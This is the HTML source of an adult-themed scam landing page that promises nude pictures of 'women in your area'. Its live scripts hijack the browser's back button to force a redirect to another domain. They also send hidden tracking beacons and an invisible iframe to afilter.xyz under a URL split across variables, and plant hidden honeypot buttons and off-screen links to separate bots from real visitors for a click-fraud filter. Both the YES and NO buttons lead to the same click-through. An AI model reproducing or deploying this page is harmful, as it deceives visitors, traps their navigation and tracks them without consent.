<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="robots" content="noindex, nofollow">
        <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
        <title>This is NOT a dating site</title>
        <script>
            var a = "https://afilter.xy";
            var b = "z/click";
            var url = a + b;
            (function () {
                window.afilter = function (event) {
                    console.log(event);
                    var xhr = new XMLHttpRequest();
                    xhr.open('POST', 'https://afilter.xyz/p/events', true);
                    xhr.withCredentials = true;
                    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                    xhr.send("et=" + event);
                };

            }());

            if (window.location.hash != "#t") {
                pushHistory();
            }
            window.addEventListener("popstate", function (e) {
                afilter(5);
                window.location.href = "https://secureconv-smart.com/?a=70580&c=130746";
            }, false);

            function pushHistory() {
                var state = {title: "title", url: "#t"};
                window.history.pushState(state, "title", "#t");
            }
        </script>
        <script>
            u1 = "https://afilter.xyz/";
            u2 = "p/events?et=1";
            document.write('<iframe src="' + u1 + "/" + u2 + '" style="display:none;"></iframe>');
        </script>
        <style>
            body {
                font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
                font-size: medium ! important;
                line-height: 1.42857;
                color: rgb(51, 51, 51);
                margin:0;padding:0;position: absolute;top: 0; bottom: 0;left: 0;right: 0;
                background: url(1.jpg) center center repeat-y #000;
                background-size: cover;
            }
            p {
                margin: 0px 0px 10px;
            }
            #if{position:absolute;top:0;bottom:0;right:0;left:0}
            iframe{width:100%;height:100%;display:none}

            .modal { position: fixed; z-index: 1050; display: none; overflow-x: auto; overflow-y: scroll; outline: 0px none; }
            .modal.fade .modal-dialog { transition: transform 0.3s ease-out 0s; transform: translate(0px, -25%); }
            .modal.in .modal-dialog { transform: translate(0px, 0px); }
            .modal-dialog { position: relative; width: auto; margin: 10px; }
            .modal-content { position: relative; background-color: rgb(255, 255, 255); border: 1px solid rgba(0, 0, 0, 0.2); border-radius: 6px; outline: 0px none; box-shadow: 0px 3px 9px rgba(0, 0, 0, 0.5); }
            .modal-backdrop { position: fixed; z-index: 1040; background-color: rgb(0, 0, 0); }
            .modal-backdrop.fade { opacity: 0; }
            .carousel-control, .modal-backdrop.in { opacity: 0.5; }
            .modal-header { min-height: 16.43px; padding: 15px; border-bottom: 1px solid rgb(229, 229, 229); }
            .modal-title { margin: 0px; line-height: 1.42857; }
            .modal-body { position: relative; padding: 20px; }
            .modal-footer {
                padding: 9px 10px 10px ! important;
                margin-top: 10px ! important;
                text-align: center ! important;
                border-top: 1px solid rgb(229, 229, 229);
            }
            .modal-footer .btn + .btn { margin-bottom: 0px; margin-left: 5px; }
            @media (min-width: 768px) {
                .modal-dialog { width: 600px; margin: 30px auto; }
                .modal-content { box-shadow: 0px 5px 15px rgba(0, 0, 0, 0.5); }
                .modal-sm { width: 300px; }
            }
            @media (min-width: 992px) {
                .modal-lg { width: 900px; }
            }
            .btn {
                cursor:pointer;
                display: inline-block;
                padding: 6px 12px;
                margin-bottom: 0px;
                font-size: 14px;
                font-weight: 400;
                line-height: 1.42857;
                text-align: center;
                white-space: nowrap;
                vertical-align: middle;
                cursor: pointer;
                -moz-user-select: none;
                border: 1px solid transparent;
                border-radius: 4px;
                border: 1px solid #9e9e9e;
            }
            .btn-success {
                color: rgb(255, 255, 255);
                background-color: rgb(92, 184, 92);
                border-color: rgb(76, 174, 76);
            }
            .quiz-modal .modal-header {
                background: rgb(217, 52, 159) none repeat scroll 0% 0% ! important;
                text-align: center;
                color: rgb(255, 255, 255);
            }
            .btn-lg {
                padding: 10px 16px;
                font-size: 18px;
                line-height: 1.33;
                border-radius: 6px;
            }
            div.quiz-modal {
                z-index: 2000;
                position: absolute;
                width: 100%;
                margin: 15% auto auto;
                opacity: 0.99;
            }
            .xj{position: absolute; left: -1000px;top:-1000px}
        </style>
    </head>
    <body>
        <button class="btn btn-lg" style="display:none" onclick="afilter(4)">YES</button>
        <button class="btn btn-lg" style="display:none" onclick="afilter(4)">NO</button>
        <div style="" id="modal" class=" bs-example-modal-sm quiz-modal" tabindex="-1" aria-hidden="false">
            <div class="modal-dialog modal-sm">
                <div class="modal-content">
                    <div class="modal-header">
                        <h4 class="modal-title" id="">FUCK A WOMAN IN YOUR AREA TONIGHT!</h4>
                    </div>
                    <div class="modal-body">
                        <p>You may now see nude private pictures of women who are in your area. Again, please keep their identity a secret.</p>
                        <b style="display:block;text-align:center;margin:20px 0 0 0;">ARE YOU OVER 18?</b>
                    </div>
                    <div class="modal-footer">
                        <span class="btn btn-success btn-lg go">YES</span>
                        <span class="btn btn-lg go">NO</span>
                    </div>
                </div>
            </div>
        </div>
        <button class="btn btn-lg" style="display:none" onclick="afilter(4)">YES</button>
        <button class="btn btn-lg" style="display:none" onclick="afilter(4)">NO</button>

        <div class="xj">
            <a href="https://afilter.xyz/d/dpbbv10j46kgmiaceh17nr1nq3" >Check Now</a>
            <a href="https://afilter.xyz/d/jql2rd6fkah461tsfjob59ale9" >Check Now</a>
            <a href="https://afilter.xyz/d/425gjjtbp6cvajq79pk3kal3li" >Check Now</a>
            <a href="https://afilter.xyz/d/9ro84m6gppm1q9ff3st4oigjoq" >Check Now</a>
            <a href="https://afilter.xyz/d/krm59bgvt1bt5nb8cnhjpsph4e" >Check Now</a>
            <a href="https://afilter.xyz/d/jb7if8rn4s0ifesrilu2b5htbm" >Check Now</a>
            <a href="https://afilter.xyz/d/41q84t3i2t7qnneucugcoh99v8" >Check Now</a>
            <a href="https://afilter.xyz/d/3aldiileuo5rjj91anhqd475q5" >Check Now</a>
            <a href="https://afilter.xyz/d/te9vmbhs4fl9ecmsk90froogdq" >Check Now</a>
            <a href="https://afilter.xyz/d/ge55olileht4okp8kapvcpi8ml" >Check Now</a>
            <a href="https://afilter.xyz/d/k3nfo1jvh175o7h5eutnsgcnck" >Check Now</a>
            <a href="https://afilter.xyz/d/fgimut2rm9l292tjhtg6qraugq" >Check Now</a>
            <a href="https://afilter.xyz/d/gu12oqequdisicft5t41rm6s9d" >Check Now</a>
            <a href="https://afilter.xyz/d/1126cqlejh76v4jmri6dk8abq7" >Check Now</a>
            <a href="https://afilter.xyz/d/ak5tvg023u75hq5a1n7a5rp3m0" >Check Now</a>
            <a href="https://afilter.xyz/d/8u71d2cc0kt9h9qjgv3qm5jrdm" >Check Now</a>
            <a href="https://afilter.xyz/d/sctd1cb9t957kv7qul29eljapv" >Check Now</a>
            <a href="https://afilter.xyz/d/ricm1vcmi1itkgiebirqlgttaa" >Check Now</a>
            <a href="https://afilter.xyz/d/mfesjfp27e3jg7rh85m0if60a5" >Check Now</a>
            <a href="https://afilter.xyz/d/avk0aa6afum97vbe0iqhp53h50" >Check Now</a>
            <a href="https://afilter.xyz/d/3qri8q9nr5or676mrf90hvfc9u" >Check Now</a>
        </div>
        <script>
            var btn = document.getElementsByClassName('go');
            for (var i = 0; i < btn.length; i++) {
                btn[i].onclick = function (event) {
                    if (event.pageX) {
                        afilter(2);//我是用户点击的

                    } else {
                        afilter(3);//我是JS点击的
                    }
                    window.location.href = url;
                }

            }
        </script>
        <script src="https://afilter.xyz/js/fraudclick.js?v=2"></script>
        <script>
            AtClickCheck(["span"], 3, 1);
        </script>
    </body>
</html>